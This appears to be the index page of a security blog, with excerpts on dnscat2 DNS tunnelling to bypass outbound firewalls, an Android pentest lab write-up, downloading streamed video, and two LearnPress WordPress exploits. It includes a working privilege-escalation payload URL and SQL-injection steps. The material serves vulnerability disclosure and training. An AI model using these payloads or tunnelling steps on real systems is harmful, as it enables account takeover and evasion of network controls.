Using dnscat2 for tunneling bypass Firewall Outbound

Step 1: Check outbound internet availability Step 2: Install dnscat2 by your way (Use this if you don’t mind the detection.) Step 3: Run ruby ./dnscat2.rb Step 4: # ruby ./dnscat2.rb (# ruby ./dnscat2.rb abc.com)Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]…No domains were selected, which means this server will only respond to direct queriesContinue reading “Using dnscat2 for tunneling bypass Firewall Outbound”

EVABSv4 write up [Part 1]

Đây là một lab về tấn công ứng dụng android cho những người mới bắt đầu pentest file apk. Người xây dựng lab này muốn giới thiệu cho những người mới bắt đầu với kiến thức hạn chế hoặc không biết về một số lỗ hổng trong ứng dụng Android. EVABS cung cấp các thửContinue reading “EVABSv4 write up [Part 1]”

Hướng dẫn download phim từ các trang stream list file .ts

HLS là gì? HLS là một giao thức truyền phát dựa trên HTTP. HLS hoạt động bằng cách chia nhỏ một luồng thành một chuỗi các gói nhỏ. Khi luồng được phát, máy khách sẽ chọn một số luồng thay thế khác nhau chứa cùng thông tin được mã hóa với nhiều tốc độ dữ liệuContinue reading “Hướng dẫn download phim từ các trang stream list file .ts”

[CVE-2020-11511] WordPress Plugin LearnPress < 3.2.6.9 – User Registration Privilege Escalation

# Exploit Title: WordPress Plugin LearnPress < 3.2.6.9 – User Registration Privilege Escalation# https://www.exploit-db.com/exploits/50138# https://packetstormsecurity.com/files/163538/WordPress-LearnPress-Privilege-Escalation.html# Date: 07-17-2021# Exploit Author: nhattruong or nhattruong.blog# Vendor Homepage: https://thimpress.com/learnpress/# Software Link: https://wordpress.org/plugins/learnpress/# Version: < 3.2.6.9# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd# CVE: CVE-2020-11511 POC:1. Find out your user id2. Login with your cred3. Execute the payload http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id&gt; # Done!

[CVE-2020-6010] WordPress Plugin LearnPress < 3.2.6.8 – Time-Based Blind SQL Injection (Authenticated)

DB-Exploit: https://www.exploit-db.com/exploits/50137PacketStorm: https://packetstormsecurity.com/files/163536/WordPress-LearnPress-SQL-Injection.html Exploit Title: WordPress Plugin LearnPress < 3.2.6.8 – SQL Injection (Authenticated) Date: 07-17-2021 Exploit Author: nhattruong or nhattruong.blog Vendor Homepage: https://thimpress.com/learnpress/ Software Link: https://wordpress.org/plugins/learnpress/ Version: < 3.2.6.8 References link: https://wpscan.com/vulnerability/10208 CVE: CVE-2020-6010 POC: Go to url http:///wp-admin Login with a cred Execute the payload Modify current_items[] as you want